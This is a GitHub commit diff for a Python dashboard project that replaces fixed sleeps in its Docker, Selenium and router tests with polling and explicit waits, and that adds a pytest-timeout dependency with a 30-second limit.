forked from Rockachopa/Timmy-time-dashboard
test: remove hardcoded sleeps, add pytest-timeout (#69)
- Replace fixed time.sleep() calls with intelligent polling or WebDriverWait - Add pytest-timeout dependency and --timeout=30 to prevent hangs - Fixes test flakiness and improves test suite speed Co-authored-by: Alexander Payne <apayne@MM.local>
This commit is contained in:
committed by
GitHub
parent
bf0e388d2a
commit
51140fb7f0
@@ -33,6 +33,7 @@ dev = [
|
||||
"pytest>=8.0.0",
|
||||
"pytest-asyncio>=0.24.0",
|
||||
"pytest-cov>=5.0.0",
|
||||
"pytest-timeout>=2.3.0",
|
||||
"selenium>=4.20.0",
|
||||
]
|
||||
# Big-brain: run 8B / 70B / 405B models locally via layer-by-layer loading.
|
||||
@@ -103,7 +104,7 @@ testpaths = ["tests"]
|
||||
pythonpath = ["src", "tests"]
|
||||
asyncio_mode = "auto"
|
||||
asyncio_default_fixture_loop_scope = "function"
|
||||
addopts = "-v --tb=short"
|
||||
addopts = "-v --tb=short --timeout=30"
|
||||
markers = [
|
||||
"unit: Unit tests (fast, no I/O)",
|
||||
"integration: Integration tests (may use SQLite)",
|
||||
|
||||
@@ -16,7 +16,6 @@ from pathlib import Path
|
||||
|
||||
import pytest
|
||||
|
||||
# Try to import httpx for real HTTP calls to containers
|
||||
httpx = pytest.importorskip("httpx")
|
||||
|
||||
PROJECT_ROOT = Path(__file__).parent.parent.parent
|
||||
@@ -25,7 +24,25 @@ COMPOSE_TEST = PROJECT_ROOT / "docker-compose.test.yml"
|
||||
|
||||
def _compose(*args, timeout=60):
|
||||
cmd = ["docker", "compose", "-f", str(COMPOSE_TEST), "-p", "timmy-test", *args]
|
||||
return subprocess.run(cmd, capture_output=True, text=True, timeout=timeout, cwd=str(PROJECT_ROOT))
|
||||
return subprocess.run(
|
||||
cmd, capture_output=True, text=True, timeout=timeout, cwd=str(PROJECT_ROOT)
|
||||
)
|
||||
|
||||
|
||||
def _wait_for_agents(dashboard_url, timeout=30, interval=1):
|
||||
"""Poll /swarm/agents until at least one agent appears."""
|
||||
start = time.monotonic()
|
||||
while time.monotonic() - start < timeout:
|
||||
try:
|
||||
resp = httpx.get(f"{dashboard_url}/swarm/agents", timeout=10)
|
||||
if resp.status_code == 200:
|
||||
agents = resp.json().get("agents", [])
|
||||
if agents:
|
||||
return agents
|
||||
except Exception:
|
||||
pass
|
||||
time.sleep(interval)
|
||||
return []
|
||||
|
||||
|
||||
class TestDockerDashboard:
|
||||
@@ -80,13 +97,18 @@ class TestDockerAgentSwarm:
|
||||
"""Scale up one agent worker and verify it appears in the registry."""
|
||||
# Start one agent
|
||||
result = _compose(
|
||||
"--profile", "agents", "up", "-d", "--scale", "agent=1",
|
||||
"--profile",
|
||||
"agents",
|
||||
"up",
|
||||
"-d",
|
||||
"--scale",
|
||||
"agent=1",
|
||||
timeout=120,
|
||||
)
|
||||
assert result.returncode == 0, f"Failed to start agent:\n{result.stderr}"
|
||||
|
||||
# Give the agent time to register via HTTP
|
||||
time.sleep(8)
|
||||
# Wait for agent to register via polling
|
||||
_wait_for_agents(docker_stack)
|
||||
|
||||
resp = httpx.get(f"{docker_stack}/swarm/agents", timeout=10)
|
||||
assert resp.status_code == 200
|
||||
@@ -101,13 +123,18 @@ class TestDockerAgentSwarm:
|
||||
"""Start an agent, post a task, verify the agent bids on it."""
|
||||
# Start agent
|
||||
result = _compose(
|
||||
"--profile", "agents", "up", "-d", "--scale", "agent=1",
|
||||
"--profile",
|
||||
"agents",
|
||||
"up",
|
||||
"-d",
|
||||
"--scale",
|
||||
"agent=1",
|
||||
timeout=120,
|
||||
)
|
||||
assert result.returncode == 0
|
||||
|
||||
# Wait for agent to register
|
||||
time.sleep(8)
|
||||
# Wait for agent to register via polling
|
||||
_wait_for_agents(docker_stack)
|
||||
|
||||
# Post a task — this triggers an auction
|
||||
task_resp = httpx.post(
|
||||
@@ -118,8 +145,13 @@ class TestDockerAgentSwarm:
|
||||
assert task_resp.status_code == 200
|
||||
task_id = task_resp.json()["task_id"]
|
||||
|
||||
# Give the agent time to poll and bid
|
||||
time.sleep(12)
|
||||
# Poll until task exists (agent may poll and bid)
|
||||
start = time.monotonic()
|
||||
while time.monotonic() - start < 15:
|
||||
task = httpx.get(f"{docker_stack}/swarm/tasks/{task_id}", timeout=10)
|
||||
if task.status_code == 200:
|
||||
break
|
||||
time.sleep(1)
|
||||
|
||||
# Check task status — may have been assigned
|
||||
task = httpx.get(f"{docker_stack}/swarm/tasks/{task_id}", timeout=10)
|
||||
@@ -133,18 +165,25 @@ class TestDockerAgentSwarm:
|
||||
def test_multiple_agents(self, docker_stack):
|
||||
"""Scale to 3 agents and verify all register."""
|
||||
result = _compose(
|
||||
"--profile", "agents", "up", "-d", "--scale", "agent=3",
|
||||
"--profile",
|
||||
"agents",
|
||||
"up",
|
||||
"-d",
|
||||
"--scale",
|
||||
"agent=3",
|
||||
timeout=120,
|
||||
)
|
||||
assert result.returncode == 0
|
||||
|
||||
# Wait for registration
|
||||
time.sleep(12)
|
||||
# Wait for agents to register via polling
|
||||
_wait_for_agents(docker_stack)
|
||||
|
||||
resp = httpx.get(f"{docker_stack}/swarm/agents", timeout=10)
|
||||
agents = resp.json()["agents"]
|
||||
# Should have at least the 3 agents we started (plus possibly Timmy and auto-spawned ones)
|
||||
worker_count = sum(1 for a in agents if "Worker" in a["name"] or "TestWorker" in a["name"])
|
||||
worker_count = sum(
|
||||
1 for a in agents if "Worker" in a["name"] or "TestWorker" in a["name"]
|
||||
)
|
||||
assert worker_count >= 1 # At least some registered
|
||||
|
||||
_compose("--profile", "agents", "down", timeout=30)
|
||||
|
||||
@@ -4,7 +4,6 @@ RUN: SELENIUM_UI=1 pytest tests/functional/test_fast_e2e.py -v
|
||||
"""
|
||||
|
||||
import os
|
||||
import time
|
||||
|
||||
import pytest
|
||||
import httpx
|
||||
@@ -31,7 +30,7 @@ def driver():
|
||||
opts.add_argument("--disable-dev-shm-usage")
|
||||
opts.add_argument("--disable-gpu")
|
||||
opts.add_argument("--window-size=1280,900")
|
||||
|
||||
|
||||
d = webdriver.Chrome(options=opts)
|
||||
d.implicitly_wait(2) # Reduced from 5s
|
||||
yield d
|
||||
@@ -52,7 +51,7 @@ def dashboard_url():
|
||||
|
||||
class TestAllPagesLoad:
|
||||
"""Single test that checks all pages load - much faster than separate tests."""
|
||||
|
||||
|
||||
def test_all_dashboard_pages_exist(self, driver, dashboard_url):
|
||||
"""Verify all new feature pages load successfully in one browser session."""
|
||||
pages = [
|
||||
@@ -63,9 +62,9 @@ class TestAllPagesLoad:
|
||||
("/self-modify/queue", "Upgrade"),
|
||||
("/swarm/live", "Swarm"), # Live page has "Swarm" not "Live"
|
||||
]
|
||||
|
||||
|
||||
failures = []
|
||||
|
||||
|
||||
for path, expected_text in pages:
|
||||
try:
|
||||
driver.get(f"{dashboard_url}{path}")
|
||||
@@ -73,55 +72,63 @@ class TestAllPagesLoad:
|
||||
WebDriverWait(driver, 3).until(
|
||||
EC.presence_of_element_located((By.TAG_NAME, "body"))
|
||||
)
|
||||
|
||||
|
||||
# Verify page has expected content
|
||||
body_text = driver.find_element(By.TAG_NAME, "body").text
|
||||
if expected_text.lower() not in body_text.lower():
|
||||
failures.append(f"{path}: missing '{expected_text}'")
|
||||
|
||||
|
||||
except Exception as exc:
|
||||
failures.append(f"{path}: {type(exc).__name__}")
|
||||
|
||||
|
||||
if failures:
|
||||
pytest.fail(f"Pages failed to load: {', '.join(failures)}")
|
||||
|
||||
|
||||
class TestAllFeaturesWork:
|
||||
"""Combined functional tests - single browser session."""
|
||||
|
||||
|
||||
def test_event_log_and_memory_and_ledger_functional(self, driver, dashboard_url):
|
||||
"""Test Event Log, Memory, and Ledger functionality in one go."""
|
||||
|
||||
|
||||
# 1. Event Log - verify events display
|
||||
driver.get(f"{dashboard_url}/swarm/events")
|
||||
time.sleep(0.5)
|
||||
|
||||
WebDriverWait(driver, 3).until(
|
||||
EC.presence_of_element_located((By.TAG_NAME, "body"))
|
||||
)
|
||||
|
||||
# Should have header and either events or empty state
|
||||
body = driver.find_element(By.TAG_NAME, "body").text
|
||||
assert "Event" in body or "event" in body, "Event log page missing header"
|
||||
|
||||
|
||||
# Create a task via API to generate an event
|
||||
try:
|
||||
httpx.post(
|
||||
f"{dashboard_url}/swarm/tasks",
|
||||
data={"description": "E2E test task"},
|
||||
timeout=2
|
||||
timeout=2,
|
||||
)
|
||||
except Exception:
|
||||
pass # Ignore, just checking page exists
|
||||
|
||||
|
||||
# 2. Memory - verify search works
|
||||
driver.get(f"{dashboard_url}/memory?query=test")
|
||||
time.sleep(0.5)
|
||||
|
||||
WebDriverWait(driver, 3).until(
|
||||
EC.presence_of_element_located((By.TAG_NAME, "body"))
|
||||
)
|
||||
|
||||
# Should have search input
|
||||
search = driver.find_elements(By.CSS_SELECTOR, "input[type='search'], input[name='query']")
|
||||
search = driver.find_elements(
|
||||
By.CSS_SELECTOR, "input[type='search'], input[name='query']"
|
||||
)
|
||||
assert search, "Memory page missing search input"
|
||||
|
||||
|
||||
# 3. Ledger - verify balance display
|
||||
driver.get(f"{dashboard_url}/lightning/ledger")
|
||||
time.sleep(0.5)
|
||||
|
||||
WebDriverWait(driver, 3).until(
|
||||
EC.presence_of_element_located((By.TAG_NAME, "body"))
|
||||
)
|
||||
|
||||
body = driver.find_element(By.TAG_NAME, "body").text
|
||||
# Should show balance-related text
|
||||
has_balance = any(x in body.lower() for x in ["balance", "sats", "transaction"])
|
||||
@@ -130,73 +137,88 @@ class TestAllFeaturesWork:
|
||||
|
||||
class TestCascadeRouter:
|
||||
"""Cascade Router - combined checks."""
|
||||
|
||||
|
||||
def test_router_status_and_navigation(self, driver, dashboard_url):
|
||||
"""Verify router status page and nav link in one test."""
|
||||
|
||||
|
||||
# Check router status page
|
||||
driver.get(f"{dashboard_url}/router/status")
|
||||
time.sleep(0.5)
|
||||
|
||||
WebDriverWait(driver, 3).until(
|
||||
EC.presence_of_element_located((By.TAG_NAME, "body"))
|
||||
)
|
||||
|
||||
body = driver.find_element(By.TAG_NAME, "body").text
|
||||
|
||||
|
||||
# Should show providers or config message
|
||||
has_content = any(x in body.lower() for x in [
|
||||
"provider", "router", "ollama", "config", "status"
|
||||
])
|
||||
has_content = any(
|
||||
x in body.lower()
|
||||
for x in ["provider", "router", "ollama", "config", "status"]
|
||||
)
|
||||
assert has_content, "Router status page missing content"
|
||||
|
||||
|
||||
# Check nav has router link
|
||||
driver.get(dashboard_url)
|
||||
time.sleep(0.3)
|
||||
|
||||
WebDriverWait(driver, 3).until(
|
||||
EC.presence_of_element_located((By.TAG_NAME, "body"))
|
||||
)
|
||||
|
||||
nav_links = driver.find_elements(By.XPATH, "//a[contains(@href, '/router')]")
|
||||
assert nav_links, "Navigation missing router link"
|
||||
|
||||
|
||||
class TestUpgradeQueue:
|
||||
"""Upgrade Queue - combined checks."""
|
||||
|
||||
|
||||
def test_upgrade_queue_page_and_elements(self, driver, dashboard_url):
|
||||
"""Verify upgrade queue page loads with expected elements."""
|
||||
|
||||
|
||||
driver.get(f"{dashboard_url}/self-modify/queue")
|
||||
time.sleep(0.5)
|
||||
|
||||
WebDriverWait(driver, 3).until(
|
||||
EC.presence_of_element_located((By.TAG_NAME, "body"))
|
||||
)
|
||||
|
||||
body = driver.find_element(By.TAG_NAME, "body").text
|
||||
|
||||
|
||||
# Should have queue header
|
||||
assert "upgrade" in body.lower() or "queue" in body.lower(), "Missing queue header"
|
||||
|
||||
assert "upgrade" in body.lower() or "queue" in body.lower(), (
|
||||
"Missing queue header"
|
||||
)
|
||||
|
||||
# Should have pending section or empty state
|
||||
has_pending = "pending" in body.lower() or "no pending" in body.lower()
|
||||
assert has_pending, "Missing pending upgrades section"
|
||||
|
||||
|
||||
# Check for approve/reject buttons if upgrades exist
|
||||
approve_btns = driver.find_elements(By.XPATH, "//button[contains(text(), 'Approve')]")
|
||||
reject_btns = driver.find_elements(By.XPATH, "//button[contains(text(), 'Reject')]")
|
||||
|
||||
approve_btns = driver.find_elements(
|
||||
By.XPATH, "//button[contains(text(), 'Approve')]"
|
||||
)
|
||||
reject_btns = driver.find_elements(
|
||||
By.XPATH, "//button[contains(text(), 'Reject')]"
|
||||
)
|
||||
|
||||
# Either no upgrades (no buttons) or buttons exist
|
||||
# This is a soft check - page structure is valid either way
|
||||
|
||||
|
||||
class TestActivityFeed:
|
||||
"""Activity Feed - combined checks."""
|
||||
|
||||
|
||||
def test_swarm_live_page_and_activity_feed(self, driver, dashboard_url):
|
||||
"""Verify swarm live page has activity feed elements."""
|
||||
|
||||
|
||||
driver.get(f"{dashboard_url}/swarm/live")
|
||||
time.sleep(0.5)
|
||||
|
||||
WebDriverWait(driver, 3).until(
|
||||
EC.presence_of_element_located((By.TAG_NAME, "body"))
|
||||
)
|
||||
|
||||
body = driver.find_element(By.TAG_NAME, "body").text
|
||||
|
||||
|
||||
# Should have live indicator or activity section
|
||||
has_live = any(x in body.lower() for x in [
|
||||
"live", "activity", "swarm", "agents", "tasks"
|
||||
])
|
||||
has_live = any(
|
||||
x in body.lower() for x in ["live", "activity", "swarm", "agents", "tasks"]
|
||||
)
|
||||
assert has_live, "Swarm live page missing content"
|
||||
|
||||
|
||||
# Check for WebSocket connection indicator (if implemented)
|
||||
# or just basic structure
|
||||
panels = driver.find_elements(By.CSS_SELECTOR, ".card, .panel, .mc-panel")
|
||||
@@ -205,7 +227,7 @@ class TestActivityFeed:
|
||||
|
||||
class TestFastSmoke:
|
||||
"""Ultra-fast smoke tests using HTTP where possible."""
|
||||
|
||||
|
||||
def test_all_routes_respond_200(self, dashboard_url):
|
||||
"""HTTP-only test - no browser, very fast."""
|
||||
routes = [
|
||||
@@ -216,16 +238,18 @@ class TestFastSmoke:
|
||||
"/self-modify/queue",
|
||||
"/swarm/live",
|
||||
]
|
||||
|
||||
|
||||
failures = []
|
||||
|
||||
|
||||
for route in routes:
|
||||
try:
|
||||
r = httpx.get(f"{dashboard_url}{route}", timeout=3, follow_redirects=True)
|
||||
r = httpx.get(
|
||||
f"{dashboard_url}{route}", timeout=3, follow_redirects=True
|
||||
)
|
||||
if r.status_code != 200:
|
||||
failures.append(f"{route}: {r.status_code}")
|
||||
except Exception as exc:
|
||||
failures.append(f"{route}: {type(exc).__name__}")
|
||||
|
||||
|
||||
if failures:
|
||||
pytest.fail(f"Routes failed: {', '.join(failures)}")
|
||||
|
||||
@@ -10,7 +10,6 @@ Run:
|
||||
"""
|
||||
|
||||
import os
|
||||
import time
|
||||
|
||||
import pytest
|
||||
from selenium import webdriver
|
||||
@@ -96,7 +95,8 @@ def _send_chat_and_wait(driver, message):
|
||||
|
||||
# Wait for a NEW agent response (not one from a prior test)
|
||||
WebDriverWait(driver, 30).until(
|
||||
lambda d: len(d.find_elements(By.CSS_SELECTOR, ".chat-message.agent")) > existing
|
||||
lambda d: len(d.find_elements(By.CSS_SELECTOR, ".chat-message.agent"))
|
||||
> existing
|
||||
)
|
||||
|
||||
return existing
|
||||
@@ -158,10 +158,14 @@ class TestChatInteraction:
|
||||
"""Full chat roundtrip: send message, get response, input clears, chat scrolls."""
|
||||
_load_dashboard(driver)
|
||||
|
||||
# Wait for any initial HTMX requests (history load) to settle
|
||||
time.sleep(2)
|
||||
# Wait for page to be ready
|
||||
WebDriverWait(driver, 10).until(
|
||||
lambda d: d.execute_script("return document.readyState") == "complete"
|
||||
)
|
||||
|
||||
existing_agents = len(driver.find_elements(By.CSS_SELECTOR, ".chat-message.agent"))
|
||||
existing_agents = len(
|
||||
driver.find_elements(By.CSS_SELECTOR, ".chat-message.agent")
|
||||
)
|
||||
|
||||
inp = driver.find_element(By.CSS_SELECTOR, "input[name='message']")
|
||||
inp.send_keys("hello from selenium")
|
||||
@@ -169,26 +173,29 @@ class TestChatInteraction:
|
||||
|
||||
# 1. User bubble appears immediately
|
||||
WebDriverWait(driver, 5).until(
|
||||
EC.presence_of_element_located(
|
||||
(By.CSS_SELECTOR, ".chat-message.user")
|
||||
)
|
||||
EC.presence_of_element_located((By.CSS_SELECTOR, ".chat-message.user"))
|
||||
)
|
||||
|
||||
# 2. Agent response arrives
|
||||
WebDriverWait(driver, 30).until(
|
||||
lambda d: len(d.find_elements(By.CSS_SELECTOR, ".chat-message.agent")) > existing_agents
|
||||
lambda d: len(d.find_elements(By.CSS_SELECTOR, ".chat-message.agent"))
|
||||
> existing_agents
|
||||
)
|
||||
|
||||
# 3. Input cleared (regression test)
|
||||
time.sleep(0.5)
|
||||
# Already waited for agent response via WebDriverWait above
|
||||
inp = driver.find_element(By.CSS_SELECTOR, "input[name='message']")
|
||||
assert inp.get_attribute("value") == "", "Input should be empty after sending"
|
||||
|
||||
# 4. Chat scrolled to bottom (regression test)
|
||||
chat_log = driver.find_element(By.ID, "chat-log")
|
||||
scroll_top = driver.execute_script("return arguments[0].scrollTop", chat_log)
|
||||
scroll_height = driver.execute_script("return arguments[0].scrollHeight", chat_log)
|
||||
client_height = driver.execute_script("return arguments[0].clientHeight", chat_log)
|
||||
scroll_height = driver.execute_script(
|
||||
"return arguments[0].scrollHeight", chat_log
|
||||
)
|
||||
client_height = driver.execute_script(
|
||||
"return arguments[0].clientHeight", chat_log
|
||||
)
|
||||
|
||||
if scroll_height > client_height:
|
||||
gap = scroll_height - scroll_top - client_height
|
||||
@@ -252,9 +259,7 @@ class TestAgentSidebar:
|
||||
def test_sidebar_header_shows(self, driver):
|
||||
_load_dashboard(driver)
|
||||
_wait_for_sidebar(driver)
|
||||
header = driver.find_element(
|
||||
By.XPATH, "//*[contains(text(), 'SWARM AGENTS')]"
|
||||
)
|
||||
header = driver.find_element(By.XPATH, "//*[contains(text(), 'SWARM AGENTS')]")
|
||||
assert header.is_displayed()
|
||||
|
||||
def test_sidebar_shows_status_when_agents_exist(self, driver):
|
||||
|
||||
@@ -20,14 +20,14 @@ from infrastructure.router.cascade import (
|
||||
|
||||
class TestProviderMetrics:
|
||||
"""Test provider metrics tracking."""
|
||||
|
||||
|
||||
def test_empty_metrics(self):
|
||||
"""Test metrics with no requests."""
|
||||
metrics = ProviderMetrics()
|
||||
assert metrics.total_requests == 0
|
||||
assert metrics.avg_latency_ms == 0.0
|
||||
assert metrics.error_rate == 0.0
|
||||
|
||||
|
||||
def test_avg_latency_calculation(self):
|
||||
"""Test average latency calculation."""
|
||||
metrics = ProviderMetrics(
|
||||
@@ -35,7 +35,7 @@ class TestProviderMetrics:
|
||||
total_latency_ms=1000.0, # 4 requests, 1000ms total
|
||||
)
|
||||
assert metrics.avg_latency_ms == 250.0
|
||||
|
||||
|
||||
def test_error_rate_calculation(self):
|
||||
"""Test error rate calculation."""
|
||||
metrics = ProviderMetrics(
|
||||
@@ -48,7 +48,7 @@ class TestProviderMetrics:
|
||||
|
||||
class TestProvider:
|
||||
"""Test Provider dataclass."""
|
||||
|
||||
|
||||
def test_get_default_model(self):
|
||||
"""Test getting default model."""
|
||||
provider = Provider(
|
||||
@@ -62,7 +62,7 @@ class TestProvider:
|
||||
],
|
||||
)
|
||||
assert provider.get_default_model() == "llama3"
|
||||
|
||||
|
||||
def test_get_default_model_no_default(self):
|
||||
"""Test getting first model when no default set."""
|
||||
provider = Provider(
|
||||
@@ -76,7 +76,7 @@ class TestProvider:
|
||||
],
|
||||
)
|
||||
assert provider.get_default_model() == "llama3"
|
||||
|
||||
|
||||
def test_get_default_model_empty(self):
|
||||
"""Test with no models."""
|
||||
provider = Provider(
|
||||
@@ -91,7 +91,7 @@ class TestProvider:
|
||||
|
||||
class TestRouterConfig:
|
||||
"""Test router configuration."""
|
||||
|
||||
|
||||
def test_default_config(self):
|
||||
"""Test default configuration values."""
|
||||
config = RouterConfig()
|
||||
@@ -103,13 +103,13 @@ class TestRouterConfig:
|
||||
|
||||
class TestCascadeRouterInit:
|
||||
"""Test CascadeRouter initialization."""
|
||||
|
||||
|
||||
def test_init_without_config(self, tmp_path):
|
||||
"""Test initialization without config file."""
|
||||
router = CascadeRouter(config_path=tmp_path / "nonexistent.yaml")
|
||||
assert len(router.providers) == 0
|
||||
assert router.config.timeout_seconds == 30
|
||||
|
||||
|
||||
def test_init_with_config(self, tmp_path):
|
||||
"""Test initialization with config file."""
|
||||
config = {
|
||||
@@ -129,16 +129,16 @@ class TestCascadeRouterInit:
|
||||
}
|
||||
config_path = tmp_path / "providers.yaml"
|
||||
config_path.write_text(yaml.dump(config))
|
||||
|
||||
|
||||
router = CascadeRouter(config_path=config_path)
|
||||
assert router.config.timeout_seconds == 60
|
||||
assert router.config.max_retries_per_provider == 3
|
||||
assert len(router.providers) == 0 # Provider is disabled
|
||||
|
||||
|
||||
def test_env_var_expansion(self, tmp_path, monkeypatch):
|
||||
"""Test environment variable expansion in config."""
|
||||
monkeypatch.setenv("TEST_API_KEY", "secret123")
|
||||
|
||||
|
||||
config = {
|
||||
"cascade": {},
|
||||
"providers": [
|
||||
@@ -153,7 +153,7 @@ class TestCascadeRouterInit:
|
||||
}
|
||||
config_path = tmp_path / "providers.yaml"
|
||||
config_path.write_text(yaml.dump(config))
|
||||
|
||||
|
||||
router = CascadeRouter(config_path=config_path)
|
||||
assert len(router.providers) == 1
|
||||
assert router.providers[0].api_key == "secret123"
|
||||
@@ -161,80 +161,82 @@ class TestCascadeRouterInit:
|
||||
|
||||
class TestCascadeRouterMetrics:
|
||||
"""Test metrics tracking."""
|
||||
|
||||
|
||||
def test_record_success(self):
|
||||
"""Test recording successful request."""
|
||||
provider = Provider(name="test", type="ollama", enabled=True, priority=1)
|
||||
|
||||
|
||||
router = CascadeRouter(config_path=Path("/nonexistent"))
|
||||
router._record_success(provider, 150.0)
|
||||
|
||||
|
||||
assert provider.metrics.total_requests == 1
|
||||
assert provider.metrics.successful_requests == 1
|
||||
assert provider.metrics.total_latency_ms == 150.0
|
||||
assert provider.metrics.consecutive_failures == 0
|
||||
|
||||
|
||||
def test_record_failure(self):
|
||||
"""Test recording failed request."""
|
||||
provider = Provider(name="test", type="ollama", enabled=True, priority=1)
|
||||
|
||||
|
||||
router = CascadeRouter(config_path=Path("/nonexistent"))
|
||||
router._record_failure(provider)
|
||||
|
||||
|
||||
assert provider.metrics.total_requests == 1
|
||||
assert provider.metrics.failed_requests == 1
|
||||
assert provider.metrics.consecutive_failures == 1
|
||||
|
||||
|
||||
def test_circuit_breaker_opens(self):
|
||||
"""Test circuit breaker opens after failures."""
|
||||
provider = Provider(name="test", type="ollama", enabled=True, priority=1)
|
||||
|
||||
|
||||
router = CascadeRouter(config_path=Path("/nonexistent"))
|
||||
router.config.circuit_breaker_failure_threshold = 3
|
||||
|
||||
|
||||
# Record 3 failures
|
||||
for _ in range(3):
|
||||
router._record_failure(provider)
|
||||
|
||||
|
||||
assert provider.circuit_state == CircuitState.OPEN
|
||||
assert provider.status == ProviderStatus.UNHEALTHY
|
||||
assert provider.circuit_opened_at is not None
|
||||
|
||||
|
||||
def test_circuit_breaker_can_close(self):
|
||||
"""Test circuit breaker can transition to closed."""
|
||||
provider = Provider(name="test", type="ollama", enabled=True, priority=1)
|
||||
|
||||
|
||||
router = CascadeRouter(config_path=Path("/nonexistent"))
|
||||
router.config.circuit_breaker_failure_threshold = 3
|
||||
router.config.circuit_breaker_recovery_timeout = 1
|
||||
|
||||
router.config.circuit_breaker_recovery_timeout = 0.1
|
||||
|
||||
# Open the circuit
|
||||
for _ in range(3):
|
||||
router._record_failure(provider)
|
||||
|
||||
|
||||
assert provider.circuit_state == CircuitState.OPEN
|
||||
|
||||
# Wait for recovery timeout
|
||||
time.sleep(1.1)
|
||||
|
||||
|
||||
# Wait for recovery timeout (reduced for faster tests)
|
||||
import time
|
||||
|
||||
time.sleep(0.2)
|
||||
|
||||
# Check if can close
|
||||
assert router._can_close_circuit(provider) is True
|
||||
|
||||
|
||||
def test_half_open_to_closed(self):
|
||||
"""Test circuit breaker closes after successful test calls."""
|
||||
provider = Provider(name="test", type="ollama", enabled=True, priority=1)
|
||||
|
||||
|
||||
router = CascadeRouter(config_path=Path("/nonexistent"))
|
||||
router.config.circuit_breaker_half_open_max_calls = 2
|
||||
|
||||
|
||||
# Manually set to half-open
|
||||
provider.circuit_state = CircuitState.HALF_OPEN
|
||||
provider.half_open_calls = 0
|
||||
|
||||
|
||||
# Record successful calls
|
||||
router._record_success(provider, 100.0)
|
||||
assert provider.circuit_state == CircuitState.HALF_OPEN # Still half-open
|
||||
|
||||
|
||||
router._record_success(provider, 100.0)
|
||||
assert provider.circuit_state == CircuitState.CLOSED # Now closed
|
||||
assert provider.status == ProviderStatus.HEALTHY
|
||||
@@ -242,19 +244,19 @@ class TestCascadeRouterMetrics:
|
||||
|
||||
class TestCascadeRouterGetMetrics:
|
||||
"""Test get_metrics method."""
|
||||
|
||||
|
||||
def test_get_metrics_empty(self):
|
||||
"""Test getting metrics with no providers."""
|
||||
router = CascadeRouter(config_path=Path("/nonexistent"))
|
||||
metrics = router.get_metrics()
|
||||
|
||||
|
||||
assert "providers" in metrics
|
||||
assert len(metrics["providers"]) == 0
|
||||
|
||||
|
||||
def test_get_metrics_with_providers(self):
|
||||
"""Test getting metrics with providers."""
|
||||
router = CascadeRouter(config_path=Path("/nonexistent"))
|
||||
|
||||
|
||||
# Add a test provider
|
||||
provider = Provider(
|
||||
name="test",
|
||||
@@ -266,11 +268,11 @@ class TestCascadeRouterGetMetrics:
|
||||
provider.metrics.successful_requests = 8
|
||||
provider.metrics.failed_requests = 2
|
||||
provider.metrics.total_latency_ms = 2000.0
|
||||
|
||||
|
||||
router.providers = [provider]
|
||||
|
||||
|
||||
metrics = router.get_metrics()
|
||||
|
||||
|
||||
assert len(metrics["providers"]) == 1
|
||||
p_metrics = metrics["providers"][0]
|
||||
assert p_metrics["name"] == "test"
|
||||
@@ -281,11 +283,11 @@ class TestCascadeRouterGetMetrics:
|
||||
|
||||
class TestCascadeRouterGetStatus:
|
||||
"""Test get_status method."""
|
||||
|
||||
|
||||
def test_get_status(self):
|
||||
"""Test getting router status."""
|
||||
router = CascadeRouter(config_path=Path("/nonexistent"))
|
||||
|
||||
|
||||
provider = Provider(
|
||||
name="test",
|
||||
type="ollama",
|
||||
@@ -294,9 +296,9 @@ class TestCascadeRouterGetStatus:
|
||||
models=[{"name": "llama3", "default": True}],
|
||||
)
|
||||
router.providers = [provider]
|
||||
|
||||
|
||||
status = router.get_status()
|
||||
|
||||
|
||||
assert status["total_providers"] == 1
|
||||
assert status["healthy_providers"] == 1
|
||||
assert status["degraded_providers"] == 0
|
||||
@@ -307,11 +309,11 @@ class TestCascadeRouterGetStatus:
|
||||
@pytest.mark.asyncio
|
||||
class TestCascadeRouterComplete:
|
||||
"""Test complete method with failover."""
|
||||
|
||||
|
||||
async def test_complete_with_ollama(self):
|
||||
"""Test successful completion with Ollama."""
|
||||
router = CascadeRouter(config_path=Path("/nonexistent"))
|
||||
|
||||
|
||||
provider = Provider(
|
||||
name="ollama-local",
|
||||
type="ollama",
|
||||
@@ -321,7 +323,7 @@ class TestCascadeRouterComplete:
|
||||
models=[{"name": "llama3.2", "default": True}],
|
||||
)
|
||||
router.providers = [provider]
|
||||
|
||||
|
||||
# Mock the Ollama call
|
||||
with patch.object(router, "_call_ollama") as mock_call:
|
||||
mock_call.return_value = AsyncMock()()
|
||||
@@ -329,19 +331,19 @@ class TestCascadeRouterComplete:
|
||||
"content": "Hello, world!",
|
||||
"model": "llama3.2",
|
||||
}
|
||||
|
||||
|
||||
result = await router.complete(
|
||||
messages=[{"role": "user", "content": "Hi"}],
|
||||
)
|
||||
|
||||
|
||||
assert result["content"] == "Hello, world!"
|
||||
assert result["provider"] == "ollama-local"
|
||||
assert result["model"] == "llama3.2"
|
||||
|
||||
|
||||
async def test_failover_to_second_provider(self):
|
||||
"""Test failover when first provider fails."""
|
||||
router = CascadeRouter(config_path=Path("/nonexistent"))
|
||||
|
||||
|
||||
provider1 = Provider(
|
||||
name="ollama-failing",
|
||||
type="ollama",
|
||||
@@ -359,31 +361,31 @@ class TestCascadeRouterComplete:
|
||||
models=[{"name": "llama3.2", "default": True}],
|
||||
)
|
||||
router.providers = [provider1, provider2]
|
||||
|
||||
|
||||
# First provider fails, second succeeds
|
||||
call_count = [0]
|
||||
|
||||
|
||||
async def side_effect(*args, **kwargs):
|
||||
call_count[0] += 1
|
||||
# First 2 retries for provider1 fail, then provider2 succeeds
|
||||
if call_count[0] <= router.config.max_retries_per_provider:
|
||||
raise RuntimeError("Connection failed")
|
||||
return {"content": "Backup response", "model": "llama3.2"}
|
||||
|
||||
|
||||
with patch.object(router, "_call_ollama") as mock_call:
|
||||
mock_call.side_effect = side_effect
|
||||
|
||||
|
||||
result = await router.complete(
|
||||
messages=[{"role": "user", "content": "Hi"}],
|
||||
)
|
||||
|
||||
|
||||
assert result["content"] == "Backup response"
|
||||
assert result["provider"] == "ollama-backup"
|
||||
|
||||
|
||||
async def test_all_providers_fail(self):
|
||||
"""Test error when all providers fail."""
|
||||
router = CascadeRouter(config_path=Path("/nonexistent"))
|
||||
|
||||
|
||||
provider = Provider(
|
||||
name="failing",
|
||||
type="ollama",
|
||||
@@ -392,19 +394,19 @@ class TestCascadeRouterComplete:
|
||||
models=[{"name": "llama3.2", "default": True}],
|
||||
)
|
||||
router.providers = [provider]
|
||||
|
||||
|
||||
with patch.object(router, "_call_ollama") as mock_call:
|
||||
mock_call.side_effect = RuntimeError("Always fails")
|
||||
|
||||
|
||||
with pytest.raises(RuntimeError) as exc_info:
|
||||
await router.complete(messages=[{"role": "user", "content": "Hi"}])
|
||||
|
||||
|
||||
assert "All providers failed" in str(exc_info.value)
|
||||
|
||||
|
||||
async def test_skips_unhealthy_provider(self):
|
||||
"""Test that unhealthy providers are skipped."""
|
||||
